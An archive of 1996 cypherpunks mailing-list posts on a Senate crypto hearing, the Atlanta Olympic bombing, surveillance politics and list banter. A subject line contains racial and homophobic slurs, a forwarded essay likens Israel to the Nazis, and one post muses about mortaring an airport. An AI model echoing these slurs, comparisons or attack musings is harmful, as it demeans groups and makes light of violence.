Date: Sun, 28 Jul 1996 02:42:55 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fireworks expected, missed at Senate crypto hearing
Message-ID: <2.2.32.19960727164414.006bec60@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>>more about terrorists. And Sen. Slate Gorton (R-Wash) jumped on the
>>committee staff for leaning too far *away* from national security interests
>>in their summary of the legislation.
>
>What does that mean?  As opposed to what?  (Gorton's my Senator, and I'm 
>going to give a little feedback to his local office...)

(If you have Real-Audio capability, you can listen to the hearings at
www.hotwired.com/wiredside).
Basically he expressed his disappointment at the committee for having a 
biased view and having minds that were already made up regarding the issue,
and he said he was beginning to lean towards the bill, but the attitude of
the committee just might make him vote against it.  
He's my senator too and believe me he got some feedback! =)
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sat, 27 Jul 1996 23:46:19 +0800
To: cypherpunks@toad.com
Subject: Re: The Four Horsemen Go to the Olympics!
Message-ID: <SIMEON.9607270907.A@muahost.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


ANybody got a big timer I can run at boot up ?? PC and MAC 
?  

I travel a lot !


On Sat, 27 Jul 1996 01:43:11 -0700 Bill Stewart 
<stewarts@ix.netcom.com> wrote:

> At 11:15 PM 7/26/96 -0700, 
Alan Olsen <alano@teleport.com> wrote:
> >Well, there was an explosion at the Olympics...  It may have been a bomb or
> >it may have been a transformer.
> >Expect this to be used as fuel as to why every one in America must be under
> >constant survelance by the Government.
> >The Four Horsemen are now an Olympic Event!
> 
> Yeah, it's been a wild week.  There was also an airplane hijacking
> today, which ended peacefully.  The hijacker had a laptop wrapped
> in tinfoil he was claiming was a bomb.*  And of course Clinton's
> first speeches after the TWA crash were "we don't have any evidence
> of terrorism yet but you'll all have to give up your civil liberties
> so we can do a better job of protecting you."
> 
> ----
> *Penn Jillette proposed that a good boot-up program for laptops
> and PDAs is one that displays a big timer counting backwards,
> for use in airports that want to see that you've got a real laptop.
> 
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # <A HREF="http://idiom.com/~wcs"> 
> #			Dispel Authority!
> 

----------------------
Charley Sparks
sparks@bah.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Jul 1996 03:15:32 +0800
To: Mike van der Merwe <cypherpunks@toad.com
Subject: Re: Olympic bombing
Message-ID: <199607271652.JAA12072@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:41 PM 7/27/96 +0200, Mike van der Merwe wrote:
>
>Hi all
>
>I can just see the FBI screaming "we need weaker encryption to combat
>terrosism on US soil" with nasty effects -- it seems all to many people,
>lawmakers included, will be only to happy to sacrifice their privacy that
>the FBI can better combat these terrorist acts (which could *of course*
>could been prevented had only the FBI been able to read their encrypted
>mail...)
>
>Somehow I got the feeling watching CNN that the FBI was given a shitload
>of ammo. Call me cynical but the Reichstag fire comes to mind... 
>
>Later
>Mike

This was on another list.  It expresses my sentiments quite well.



>Received: from ez0.ezlink.com (lneil@ez0.ezlink.com [199.45.150.1]) by
bud.indirect.com (8.7.4/8.6.6) with SMTP id UAA15498; Fri, 26 Jul 1996
20:36:06 -0700 (MST)
>Received: by ez0.ezlink.com id AA20227
>  (5.67b/IDA-1.5); Fri, 26 Jul 1996 21:36:25 -0600
>Date: Fri, 26 Jul 1996 21:36:25 -0600
>From: "L. Neil Smith" <lneil@ez0.ezlink.com>
>Message-Id: <199607270336.AA20227@ez0.ezlink.com>
>To: mongoose@indirect.com
>Subject: TWA 800 and Atlanta
>Cc: tompkins@indirect.com
>
>TWA 800 AND THE POLICE STATE OF GEORGIA
>
>By L. Neil Smith <lneil@ezlink.com>
>
>Special to _The Libertarian Enterprise_
>
>    I've been sitting around all week, watching the Olympics whether I 
>like it or not, because my wife and daughter want to watch them, and I 
>can deny them nothing.  
>
>    In between undeniably dramatic moments -- astonishingly courageous 
>little girls "playing hurt", as if they were major-league football 
>players -- I've been treated to story after story of how, due to the 
>efforts of thousands of uniformed professional paranoids, Georgia, USA 
>is coming to resemble _Soviet_ Georgia.  The sight of _hundreds_ of 
>trailers moved in to house these security "troops" is demoralizing in 
>and of itself to anyone with a regard for a free society.  
>
>    At the same time, I've been a TV witness to the tragedy of TWA 
>Flight 800 and an ignoble struggle by network fear-vampires to wring 
>the story of its last delectable drop -- "It was a bomb!"  "It was a 
>missile!"  "It was a bomb!" "It was a missile!" -- the whole thing 
>beginning to sound like a macabre Certs commercial.  
>
>    Over it all hung the spectre of international terrorism, and the 
>swollen, corrupt, bulbous-nosed, droopy-jowled visage of a politician 
>(no "New Democrat" as it turns out, but just another damned fascist) 
>grimly determined -- exactly like Richard Milhous "Guns are an 
>Abomination" Nixon before him -- to be the last democratically elected 
>President of the United States:  William Jefferson Blythe Clinton.  
>
>    Clinton -- aided by his vile minions, the national "news" media -- 
>went into raptures of ecstasy, listing all the ways that the freedom 
>of Americans would have to be curtailed (Clinton has spoken of this 
>before; it's a favorite theme of his) due to the heinous act he 
>transparently hoped had been committed against TWA 800.  
>
>    Afterward, the round-heeled sprayheads obligingly searched out the 
>usual street-cretins to rubberstamp Our Glorious Leader's latest Five 
>Minute Plan, and add that they wouldn't mind at all paying extra for 
>the "service" of having their inalienable rights violated even worse 
>-- within the increasingly Bulgarian-style compounds American airports 
>have become -- than they're being violated now.  
>
>    But there's a simpler, more effective way to prevent the criminal 
>acts generally labelled "terrorism" that Clinton and his idiot-box 
>doxies don't want anyone to know about. Behind virtually every 
>terrorist attack we've ever seen or suffered, it's relatively easy to 
>discover vicious and repeated acts of aggression against innocent 
>individuals by the state. 
>
>    Preceeding the highly-publicized excesses of the Irish Republican 
>Army, for example, we find 850 years of violent occupation by an 
>exceptionally brutal foreign power that's managed to con the world 
>into believing that it's civilized.  
>
>    Half a hundred years of Middle Eastern terror arise directly from 
>the fact that, instead of coming to America -- the appropriate refuge 
>for "huddled masses yearning to breathe free" -- either before or 
>after World War II, European Jews decided to take somebody else's land 
>away, and treat their victims the same way they themselves were 
>treated by the Nazis.  (In fairness, at least before the war, would-be 
>refugees from Hitler's terroristic state weren't given much choice, at 
>least not by the American Medical Association, the American Bar 
>Association, and the Roosevelt Administration, all of whom worked 
>overtime, keeping out imported professional competition.)  
>
>    Similarly, there would never have been an Oklahoma City had there 
>never been a Ruby Ridge or Waco.  If Clinton had any real interest in 
>reducing the threat of "domestic terrorism" (he most assuredly does 
>not: terrorism, like war before it, has become "the health of the 
>state") instead of ratcheting government controls tighter around the 
>necks of 250 million Americans who've done nothing wrong, he'd 
>immediately arrest, try, convict, and punish all of those responsible 
>for Ruby Ridge and Waco, abolish the outlaw agencies in whose names 
>they were perpetrated, and repeal or nullify the unconstitutional laws 
>which provided them their justification.  
>
>    The trouble is, he'd have to arrest, try, convict, and punish 
>_himself_.  
>
>    Oh, yeah, the plan:  the best-kept "secret" of our overly- 
>governmentalized age is that terrorism almost invariably 
>_reactionary_; simply stop doing things -- things you shouldn't be 
>doing anyway -- that cause terrorists to attack you and the attacks 
>will stop. 
>
>    Terrorism is the price that governments -- and their hostage 
>subjects -- pay for exercising illegitimate power.  Despite pundits 
>whose ignorance is exceeded only by their presumption (_Wall Street 
>Journal_'s Paul Gigot leaps immediately to mind) 20th century history 
>demonstrates beyond a shadow of a doubt that no further expansion of 
>that power will do anything but make make the problem worse.  
>
>    Benjamin Franklin warned us, more or less, that anyone who trades 
>liberty for safety is a fool, in part, because there ain't no such 
>_thing_ as safety.
>
>    We're reminded by Amnesty International that more individuals have 
>been murdered by governments in this century -- well over 100 million 
>-- than have died in its wars (war itself being a government 
>enterprise, as well), proving that government is a worse threat than 
>anything it claims to protect us from.  Tragedies like TWA 800 is 
>presumed to be, represent a failure of the _state_ -- of the very 
>_idea_ of the state -- and it is the state, not individuals, that must 
>be penalized, by reducing its income, and especially the power it 
>wields over individual lives.  
>
>    Americans are famous the world over for doing what was never done 
>before.  It's time we did something historically unprecedented again. 
>We flew the first airplane; we sent the first men to the Moon. Both of 
>those were possible _only_ because we were the first people ever to 
>tell a King to go to hell.  
>
>    Now it's time to tell a President to go to hell. It's time to be 
>the first people ever to _refuse_ to be steam-rollered out of our 
>liberties by jackbooted thugs claiming to protect us from people and 
>events that don't threaten any of us nearly as much as the thugs 
>themselves.  
>
>===================================
>
>L. Neil Smith's award-winning first novel, _The Probability Broach_, 
>which has long been out of print, will be republished by TOR Books 
>this October.  Permission to redistribute this article is herewith 
>granted by the author, provided that it is reproduced unedited, in its 
>entirety, and appropriate credit given.
>
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sun, 28 Jul 1996 03:29:27 +0800
To: Brendon Macaraeg <bqm1808@is.nyu.edu>
Subject: Re: "privatizing" phones?
Message-ID: <2.2.32.19960727172110.006e30bc@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>While shopping for a new phone recently, I came across
>two models (Toshiba and Uniden I believe) that
>have buttons to "privatize" you conversations. These
>were on no-cord models. Does anyone have any idea
>on what these actually do? Can the phones  change
> the frequency the call is on randomly
>so people can't tune into it? I know cellulars offer something
>similar. Personally, I would never put much faith into
>something of this sort. 

Even if they did change the frequency the call was on, 
it would be a simple matter to decode how the frequency
change was negotiated, and "follow" the call (also easily
accomplished with cellular calls).  Failing that, there is 
a very limited range of frequencies allocated for cordless 
fones, and simply re-scanning for the conversation is a 
trivial inconvenience. //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 28 Jul 1996 03:11:54 +0800
To: cypherpunks@toad.com
Subject: Vote early, vote often
Message-ID: <v03007805ae20002a2cdd@[17.219.102.4]>
MIME-Version: 1.0
Content-Type: text/plain


I've uploaded my entry in the "Big Java Applet" contest. The best
way to locate it (your vote counts) is to point Netscape to

http://www.jade.org:8001/jade/show_entries?inCat=Global_Community

The best way to view it from a Macintosh is to point the Sun
Applet viewer to

http://www.vmeng.com/pub/minow/SunClock.html

Although you can also use NetScape 3.0b5 to view it, this release
seems to have drawing problems on the Macintosh. I haven't tried other
browsers.

Your comments and improvements are welcome. There is very little
Cypherpunks relevance, although "phase of the moon" may be a
useful number to mix into a random number generator. (The source
is available from the website.)

Martin.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gregory Ellison <gregorye@microsoft.com>
Date: Sun, 28 Jul 1996 03:51:59 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Overwelmed with Stupidity...
Message-ID: <c=US%a=_%p=msft%l=RED-13-MSG-960727172150Z-2407@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>Shaun Clark <jacquard@teleport.com> writes:
>
> > Ok, ok... Let me say something, but I don't want anyone to
> > take this wrong. I'm not trying to be stupid, but I don't
> > have half the knowledge you all seem to posses.
>
and Mike Duvos <mpd@netcom.com> replies:

>That's ok.  Welcome to the list.
>
then proceeds to pull Mike's leg by telling him TRS-80 is a technical
paper by David Sternlight, DES is a synthetic estrogen that shrinks your
dick, and GAK is green slime on a kiddie show.

In my mind, this is just schoolyard bully-ism at the expense of the "new
kid."  Really mature, really nurturing of the serious values and issues
this list exists to disseminate.  Go back to second grade, Mike.

I, too, am a relative newcomer to this list, and have not participated
very actively because I'm having a hard time gauging the balance between
the genuinely useful technical and philosophical issues being discussed
(of which there are many) and the childish, irrational ranting and
insulting pseudo-intellectual one-upsmanship being bantered about (of
which there is far too much).  If people like Mike Duvos can't bring
themselves to offer any useful information to newcomers who earnestly
ask, they could at least refrain from insulting them for the "crime" of
not knowing.

Shaun, TRS-80 is an early line of microcomputers produced by Radio
Shack, DES is a (not very secure) encryption algorithm supported by the
Bureau of Standards, and GAK stand for "govenment access to keys," the
position that the government should have access to all private keys (in
escrow, of course) just in case there is a "legitimate" need to listen
in on anybody's private communications.

I believe in the values this list was founded to promulgate, and I value
it for the open political, technical and philosopical discussions of
issues crucial to our time.  And, yes, it's great to have fun, too, but
does it always have to be mean-spirited fun at someone else's expense?

-- Gregory

<gregorye@microsoft.com>
"Opinions expressed herein are entirely my own and not the opinions of
my employer."
PGP key for <gregorye@microsoft.com> is on the keyservers


>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Jul 1996 03:12:18 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: Fireworks expected, missed at Senate crypto hearing
Message-ID: <2.2.32.19960727172611.00e106c8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:44 AM 7/27/96 -0700, Cerridwyn Llewyellyn wrote:
>
>>>more about terrorists. And Sen. Slate Gorton (R-Wash) jumped on the
>>>committee staff for leaning too far *away* from national security interests
>>>in their summary of the legislation.
>>
>>What does that mean?  As opposed to what?  (Gorton's my Senator, and I'm 
>>going to give a little feedback to his local office...)
>
>(If you have Real-Audio capability, you can listen to the hearings at
>www.hotwired.com/wiredside).
>Basically he expressed his disappointment at the committee for having a 
>biased view and having minds that were already made up regarding the issue,
>and he said he was beginning to lean towards the bill, but the attitude of
>the committee just might make him vote against it.  
>He's my senator too and believe me he got some feedback! =)

I would not trust Slade Gordon as far as I can shoot him with a tree shreader.  
Gordon was the CO-SPONSOR of the CDA.  Exon got all the press, but Gordon
was just as responsible.  (Maybe the netfolk ought to make that fact well
known when he comes up for re-election. Hint! Hint!)

Where issues of freedom are involved, I doubt if he is on our side.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jul 1996 04:06:30 +0800
To: cypherpunks@toad.com
Subject: Re: Overwelmed with Stupidity...
In-Reply-To: <c=US%a=_%p=msft%l=RED-13-MSG-960727172150Z-2407@tide19.microsoft.com>
Message-ID: <199607271755.KAA17499@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Gregory Ellison <gregorye@microsoft.com> writes:

 > then proceeds to pull Mike's leg by telling him TRS-80 is a
 > technical paper by David Sternlight, DES is a synthetic
 > estrogen that shrinks your dick, and GAK is green slime on a
 > kiddie show.

Well, I will admit the first one was satire, but the last two
were perfectly accurate.  For the humor impaired, this is an
example of AOL.  (That's Acronym OverLoad, not to be confused
with the popular online service.)

You see, Gregory, there are far more things in the universe than
there are three letter abbreviations for them.  Hence, as the
number of acronyms increases, collisions are inevitable. Asking
"What is GAK?" or "What is ATM?" is really not well-defined
outside of a narrow discipline.

 > Really mature, really nurturing of the serious values and
 > issues this list exists to disseminate.

 > I, too, am a relative newcomer to this list, ...

As is evident.

 > Shaun, TRS-80 is an early line of microcomputers produced
 > by Radio Shack,

"TRS" is also an excellent line of precision torque sensors,
should you be in the market for one.

 > I believe in the values this list was founded to
 > promulgate, and I value it for the open political, technical
 > and philosopical discussions of issues crucial to our time.
 > And, yes, it's great to have fun, too, but does it always
 > have to be mean-spirited fun at someone else's expense?

Har!  If you want "mean-spirited fun", drop into rec.pets.cats
sometimes.  Methinks you live a sheltered life.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 28 Jul 1996 00:50:15 +0800
To: tcmay@got.net (Timothy C. May)
Subject: [NOISE] Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
Message-ID: <199607271502.LAA14230@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 27 Jul 96 at 4:49, and entity caling itself Timothy C. May wrote:

[..]
> Look, anyone is perfectly free to wear t-shirts espousing "Wimp Pride" and
> saying "We're gimps, we're wimps, we're dweebs, and we're PROUD!"
> 
> I just cringe when I meet young programmers at Cypherpunks who mumble "I'm
> just a computer geek." Fine, I write them off as geeks.
[..]
> As for what people ought to call themselves, e.g., when journalists ask
> what they are. just what is wrong with "engineer," "programmer,"
> "scientist," and "cryptographer"?

I prefer reclaiming far more ancient terms. "Journeyman programmer" 
gets more attention than "Consultant" and actually describes 
something.


'nuff said.

--Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 28 Jul 1996 04:15:54 +0800
To: Eric Murray <jkenth@c2.org (J. Kent Hastings)
Subject: Re: Anonymous Web Services Inc.
In-Reply-To: <Pine.SUN.3.94.960726112523.12838c-100000@infinity.c2.net>
Message-ID: <v03007800ae200a037a20@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 PM -0700 7/26/96, Eric Murray wrote:
>J. Kent Hastings writes:
>>
>> Deranged and cpunx,
>>
>> I figure the digicrime site for provocateurs.
>> Ignore them and they'll go away, or what?
>
>
>Um guys, it's a joke.

If so it's not a very good one. Like the earlier similar one last year,
he's probably going to attract unwelcome attention and end up on some lists
he'd just as soon not be on.

It's the same principle by which airline personnel take bomb jokes very
seriously. Make one and your trip will be rather longer and less direct
than you expected.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 28 Jul 1996 03:04:34 +0800
To: Shaun Clark <jacquard@teleport.com>
Subject: Re: Overwelmed with Stupidity...
In-Reply-To: <31F9C2BC.5458@teleport.com>
Message-ID: <Pine.LNX.3.93.960727110638.1763A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jul 1996, Shaun Clark wrote:

> Ok, ok... Let me say something, but I don't want anyone to take this wrong. I'm not 
> trying to be stupid, but I don't have half the knowledge you all seem to posses. For 
> instance what the heck is a TRS-80, DES, or even GAK? I probabl;y know or have heard 
> but, I'm not picking up on the three letter words. So, if you could help meout maybe I 
> just might be able to start contributing activly to this mailer!
> 

     Don't worry about TRS-80, if you are lucky, you will never need to know,
and if you are unlucky, well, let the horror wait until that point. 
     GAK is Government Access to Keys. 
     As for DES and the rest, try the standard primer Applied Cryptography, 
Protocols, Algorithms and Source Code in C by Bruse Schneier.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 28 Jul 1996 04:56:30 +0800
To: <cypherpunks@toad.com
Subject: Re: Pie cutting algorithm
In-Reply-To: <v03007803ae1f2dddab21@[206.183.203.4]>
Message-ID: <v03007801ae200c17f6de@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:40 PM -0700 7/26/96, Rollo Silver wrote:

>Tim May: as a Licensed Ontologist, do you know who made the wiseassed (but
>>deep) remark "Ontology recapitulates Philology"?

Was he being definite?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 28 Jul 1996 05:40:37 +0800
To: "Robert A. Rosenberg" <ichudov@algebra.com (Igor Chudov)
Subject: Twenty Beautiful Women
In-Reply-To: <v03007803ae1eb746c1b4@[166.84.220.80]>
Message-ID: <v03007802ae200d413cd9@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


Here's another:

Twenty beautiful women are to pass before you, one by one (or 20 handsome
men). You see only one at a time. You cannot speak to them. After seeing
any one, you must pick her or reject her. If you reject her, you cannot
change your mind. If you pick her the exercise terminates.

What is the optimal strategy for insuring you get the most beautiful woman
possible under the circumstances?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Jul 1996 05:49:35 +0800
To: cypherpunks@toad.com
Subject: Re: The Four Horsemen Go to the Olympics!
Message-ID: <2.2.32.19960727182820.00d65a58@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:22 AM 7/28/96 -0700, Timothy C. May wrote:

>By the way, the airline solution is not too difficult to visualize:
>
>1. Eliminate checked baggage, or at least require those with checked
>baggage to deposit it enough hours in advance to be inspected and to pay
>any surcharges for this inspection. (I try to only have carry-on baggage,
>and this seems to be a major trend.)
>
>2. Let the market decide. Airlines could announce their baggage inspection
>policy, and customers could decide on the tradeoffs between increased
>inspections and higher costs, and greater confidence in security.
>
>I think I'll repost my "Soft Targets" piece of a few weeks ago, in the
>light of TWA 800 and this morning's bomb in Atlanta.

Actually, if I wanted to blow up the Portland airport, all I would do is set
up a mortar up on the hills overlooking the airport.  The entire airport is
pretty visible from those hills.

There is no way to completely eliminate terrorism.  And since the imposition
of order tends to promote the escalation of disorder, I expect it to only
get worse...

And the only people to "win" will be the control freaks.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 12:55:41 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
Message-ID: <ae1ebfc60502100428f0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 AM 7/27/96, Igor Chudov @ home wrote:
>Timothy C. May wrote:
>>
>> I just cringe when I meet young programmers at Cypherpunks who mumble "I'm
>> just a computer geek." Fine, I write them off as geeks.
>>
>
>OK, I am a foreigner. Can anyone explain me what the word "geek" means
>and what are the origins of this word? I thought it was a cool word,
>meaning someone orthogonal to the present world but being able to
>change it.

No, "geek" is not a "cool" word.

"geek  n. Slang. 1. An odd or ridiculous person. 2. A carnival performer
whose show consists of bizarre acts, such as biting the head off a live
chicken. (Perhaps alteration of dialectical "geck," fool, from Low German
"gek," from Middle Low German." (American Heritage Dictionary of the
English Language, Third Edition)

And the full Oxford English Dictionary, Second Edition, Magnifying Glass
Version, gives essentially the same definition, and cites an 1875
appearance in American slang. It mentions a "dumb sideshow stooge."

Until recently, this was the only usage I knew of. One heard girls pointing
at "geeky guys" and saying "What a geek!"

Still think it's a "cool" word?

How programmers came to adopt this as a badge of pride is beyond me. (I
guess they don't especially care what the girls think, especially of course
if they're one of the oh-so-popular "Geek Queers"--I don't even want to
_think_ about what they bite the heads off of.)

That foreigners are arriving in the U.S. and calling themselves "geeks,"
"dweebs," and "nerds" reminds me of those old cruel ploys of teaching
foreigners a few words of English, e.g., "I am a very shitty person, fuck
you very much!"

Sad, real sad.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Syfrig <nsyfrig@condor.depaul.edu>
Date: Sun, 28 Jul 1996 02:31:18 +0800
To: cypherpunks@toad.com
Subject: Re: The Four Horsemen Go to the Olympics!
Message-ID: <Pine.SOL.3.91.960727112449.29476A-100000@condor.depaul.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 7/26/96 -0700, Alan Olsen <alano@teleport.com> wrote:
 >Well, there was an explosion at the Olympics...  It may have been a bomb or
 >it may have been a transformer.
 >Expect this to be used as fuel as to why every one in America must be under
 >constant survelance by the Government.
 >The Four Horsemen are now an Olympic Event!

And here's your suspect (from anonymous):
 
I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
 AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
 CAN TRACK YOU DOWN AND CLOSE THIS LIST.                            

Now all you have to do is match this sentence structure with the 911 
tape.  Maybe there's a correlation between an electronic fingerprint and 
fingerprints on the phone booth.


This is very worrysome, as it truly is a "world stage" event that could 
really serve to galvanize various governments into uniting against strong 
non-escrowed crypto.  Hey, it will look good for the international PR, 
never mind the fact that not everybody will be so 'diligent' in registering 
their keys and/or use the "approved" crypto.

And of course, this country just purchased another IBM computer for 
"nuclear simulation".  Gee, I wonder what else that power might be used 
for?  (but then again, it's from IBM, purveyor of the Olympics computer 
services)

Nathan
(standard not-my-emplyers-views disclaimer)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sun, 28 Jul 1996 01:30:43 +0800
To: cypherpunks@toad.com
Subject: Lynx...
Message-ID: <2.2.32.19960727153316.006eecb4@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have had it with all the cutsie moving graphics and Java
intrusions on my feeble 28.8 connection. Can someone PLEASE tell
me where I can get a copy of Lynx or similar text based browser
for '95 and / or NT ?

Thanks folks

Charley
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCWAwUBMfo2quJ+JZd/Y4yVAQFPkAQIyBl+XmSRoJUlpDbof8FGNi4TGexivaux
ZPPiyuCflseiw53077xP4FsF8Q1v5SgDe/87OCCDiG3XrWqOyRhah5IRmDw+3S2L
brxbTc/oqwkCddAGglF08OGOIGHa8iK0x2KhRVZPStRopNbHgVIJiDJzcSFOeFLY
mpj0jKto1s7+
=qxPe
-----END PGP SIGNATURE-----
Charles E. Sparks<sparks@bah.com>    
In God we trust, all others we encrypt !
http:/www.clark.net/pub/charley/index.htm
    Public Key At 
http://www.clark.net/pub/charley/cp_1.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 13:34:19 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling points and enthropy of human mind
Message-ID: <ae1ec530060210046ea6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 AM 7/27/96, Igor Chudov @ home wrote:
>Hi,
>
>Tim May presented an interesting concept of two persons who
>want to meet in Washington DC but forgot to decide where to meet.
>He says that they will likely to be in only several places and
>that such places will be "points of low enthropy".
>
>The question is, how do you define "enthropy" in this case?

Well, I used "entropy" in the usual sense of the constellation of definitions:

- low entropy means increased predictability (in this case, Alice and Bob
are more able to "predict" what the other will decide than if the points
were more "random")

- low entropy is associated with "less randomness" (randomness is a
notoriously controversial subject, discussed here often, so please don't
clutter the list with quibbles about randomness)

- "random" is related to "unpredictable" is related to "not compressible"
is related to "disorderly"

- "nonrandom" is related to "predictable"  is related to "compressible" is
related to "orderly"


Schelling points are of course related to the notion of "emergent order,"
in that order emerges without prior communication between Alice and Bob.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jul 1996 01:57:23 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
In-Reply-To: <199607270433.VAA28441@jobe.shell.portal.com>
Message-ID: <Pine.SV4.3.91.960727120249.18625E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
> AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
> CAN TRACK YOU DOWN AND CLOSE THIS LIST.


    At least will you let them grab us one at a time, slowly until 
elections, so that they don't run out of things to generate press 
releases with?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 13:12:08 +0800
To: cypherpunks@toad.com
Subject: Re: Why the world needs privay protecting Ecash
Message-ID: <ae1ec80d070210041aeb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:17 PM 7/26/96, Lucky Green wrote:
>>>> S.KOREA PROBES 15,000 PEOPLE OVER CREDIT CARD USE - South Korean
>>   state prosecutors are probing 15,000 people for excessive use of
>>   their credit cards overseas in a crackdown on lavish spending, a
>>   prosecution official said on Thursday. [Reuters, 200 words]
>

Good to know that the U.S. will cooperate in these investigations. I would
hate to see these South Korean's spending "the people's" money in improper
ways...oops, am I confusing South Korea with the Benevolent People's
Republic of North Korea? Or are they just converging, just as the U.S. is
